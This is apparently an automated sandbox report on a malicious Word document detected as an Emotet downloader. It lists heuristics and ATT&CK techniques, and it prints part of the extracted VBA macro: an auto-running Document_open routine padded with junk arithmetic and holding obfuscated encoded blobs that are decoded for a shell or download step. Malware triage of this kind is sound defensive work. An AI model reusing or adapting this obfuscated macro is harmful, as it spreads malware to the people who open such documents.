MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing a VBA macro that executes a shell command upon opening. This macro is designed to download and execute a secondary payload, as indicated by the 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic firings. The presence of the 'macros.bas' file further confirms the macro-based nature of this malicious document.
Heuristics 7
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46032 bytes |
SHA-256: 91f1f475e714a6c0503045463d968bcb542e2fa332ecf5fb18f59109b184eb63 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 16 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "uspoDbhj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
zZRAC _
= ChrB(39698 / Log(36398) / 57920 _
+ 28758)
EnMUJk = 39665 _
/ CBool(NFcMtG) / 74 + CSng(ldXYsO) - _
(rVAHr * pVVZMz)
Application.Run WWDwJc + "QuvdlkcsOKTjCm" + hWamj, YRqvF + OqWohrdajYjP + VhvrT
sassj _
= ChrB(6375 / Log(1053) / 92101 _
+ 52957)
OabOP = 85800 _
/ CBool(VuNbjV) / 74 + CSng(iaTqb) - _
(aijuRC * omXmkj)
End Sub
Attribute VB_Name = "DPUrGcsaw"
Sub aLEUN(jKUif)
rjzNOA _
= ChrB(67091 / Log(44416) / 53039 _
+ 82771)
DUOGcj = 98105 _
/ CBool(zhdTF) / 74 + CSng(IbdnbQ) - _
(mSYnu * NsrZij)
End Sub
Function OqWohrdajYjP()
On Error Resume Next
LADdh _
= ChrB(91932 / Log(7693) / 25947 _
+ 35639)
HmIQN = 44575 _
/ CBool(PDzKLn) / 74 + CSng(fifnjA) - _
(XKUVE * vQZztl)
GwzibwsLTj = mTqsd("lREiIANwA3ADkAMgBmADYANgA5AGUAZAA4AGUAYwBiAGIAMwBmAGIAMQA4AGIAMQBlADMAYQA1AGMAMwA5ADQAOQAzAGQAMQA5ADUAYwA5ADAAYgAxADLk", OEZHEZ - OEZHEZ + 5 + OEZHEZ - OEZHEZ, OEZHEZ - OEZHEZ + 112 + OEZHEZ - OEZHEZ)
AdMdw _
= ChrB(38378 / Log(11798) / 21634 _
+ 60205)
IzNWzD = 31497 _
/ CBool(jRmjb) / 74 + CSng(uJtAwi) - _
(RanjCR * pMuNs)
SAbvsw _
= ChrB(49580 / Log(64673) / 66136 _
+ 46960)
EIcBW = 1481 _
/ CBool(bFMLl) / 74 + CSng(NzHizm) - _
(MYhdQp * jwjKN)
DVmhdwPBP = mTqsd("a ahQGEANgA4ADgAMgA4ADUAZgAzADgAOABiADgAMwA3AGUAYwBlAGEAMABlAGUAOn2sf", LVrGz - LVrGz + 6 + LVrGz - LVrGz, LVrGz - LVrGz + 60 + LVrGz - LVrGz)
ZhniU _
= ChrB(30857 / Log(3016) / 33415 _
+ 7279)
aHPlhv = 77466 _
/ CBool(hvwofb) / 74 + CSng(lhuZdW) - _
(zVQfJ * JjlII)
YLwjYz _
= ChrB(9853 / Log(77350) / 31496 _
+ 56163)
wjYjtY = 54396 _
/ CBool(OHjczr) / 74 + CSng(aGfjS) - _
(wPWqha * HJCqU)
CnaHCSPCSd = mTqsd("fbLT9jA4AGIAYgA3AGEANgA1ADcAYQBiADEAMwAwAGEAOAAxADQAZgBhAGYAOAAzAGEAMgA4ADkAMQA2ADMANQA4AGQAYgA3ADMAOAA0AGQAOAAzAGUAZABhAGEAMwBlADMAZgAysk", GWADYo - GWADYo + 7 + GWADYo - GWADYo, GWADYo - GWADYo + 130 + GWADYo - GWADYo)
nWjuH _
= ChrB(8903 / Log(24322) / 27719 _
+ 19202)
pjzoMX = 97703 _
/ CBool(hKBzT) / 74 + CSng(qLzYT) - _
(FtHoD * qLYiGf)
fmlcX _
= ChrB(70205 / Log(8795) / 13886 _
+ 21177)
hVCir = 89883 _
/ CBool(SwnKcJ) / 74 + CSng(WwYAr) - _
(kirBbT * zvcPK)
rumOWHllRn = mTqsd("UEzAGIAMAAwAGUAOABhAGEANABjADkAMQAxADMAZABhADcAMAA4AGQAMAAyADEANwA4ADQAZgBhADcANgA4ADcAZQBmAGYAMQAyADkAZAA3ADIAMwA3ADUAMwA2ADEAOQAxAGIANQA1ADcAYQBmADMAZQAwAGIAMwBwR", kjGilr - kjGilr + 4 + kjGilr - kjGilr, kjGilr - kjGilr + 158 + kjGilr - kjGilr)
wdqKhn _
= ChrB(69323 / Log(63238) / 33624 _
+ 53388)
zCdMFZ = 23105 _
/ CBool(PibDd) / 74 + CSng(CYuoX) - _
(XAtMv * nqMHzS)
zHHJu _
= ChrB(80047 / Log(48136) / 67961 _
+ 10492)
pNJib = 33509 _
/ CBool(rRPit) / 74 + CSng(SKPiJf) - _
(TPvAaM * kZwAiV)
paktdOspB = mTqsd("ZHLUNIANgBjADQAMABhADgAYQA1ADAAMwBjADcAOQAwADgAYgBlADkAMABiAGIAYwA2ADIANwBkAGIAZgA5ADAAYwA2ADEAZAA4ADMARK", wEZpo - wEZpo + 6 + wEZpo - wEZpo, wEZpo - wEZpo + 98 + wEZpo - wEZpo)
WnYBWb _
= ChrB(89305 / Log(35653) / 51885 _
+ 10361)
DWoziH = 30781 _
/ CBool(OiaSI) / 74 + CSng(OoYRT) - _
(zYEvW * hmEwAo)
tbKlz _
= ChrB(64739 / Log(81665) / 65966 _
+ 11494)
suBFiO = 24758 _
/ CBool(wcqpH) / 74 + CSng(ivfsV) - _
(opiLC * ziHtzh)
djqNVsinzFC = mTqsd("9azAA0AGIAMABiADcAZgA1ADQAOQAwADEAYQA4ADcAYgBiAGEAMgAYuh", FWpnlv - FWpnlv + 4 + FWpnlv - FWpnlv, FWpnlv - FWpnlv + 50 + FWpnlv - FWpnlv)
RTLif _
= ChrB(7285 / Log(31422) / 34951 _
+ 74340)
lVDUu = 6058 _
/ CBool(BwNEn) / 74 + CSng(PpDwQ) - _
(REcImp * WNzoEj)
jZdTQ _
= ChrB(9819 / Log(42885) / 58206 _
+ 52314)
VEllY = 43563 _
/ CBool(INAWl) / 74 + CSng(JRCBcA) - _
(UYYtE * EPopq)
tAzIQipf = mTqsd("%m2,224,14,192,203,248,224,226,7,153,14NnjhSJ", StpzM - StpzM + 3 + StpzM - StpzM, StpzM - StpzM + 37 + StpzM - StpzM)
PIHps _
= ChrB(76291 / Log(38937) / 1378 _
+ 33566)
OIjvzU = 3719 _
/ C
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.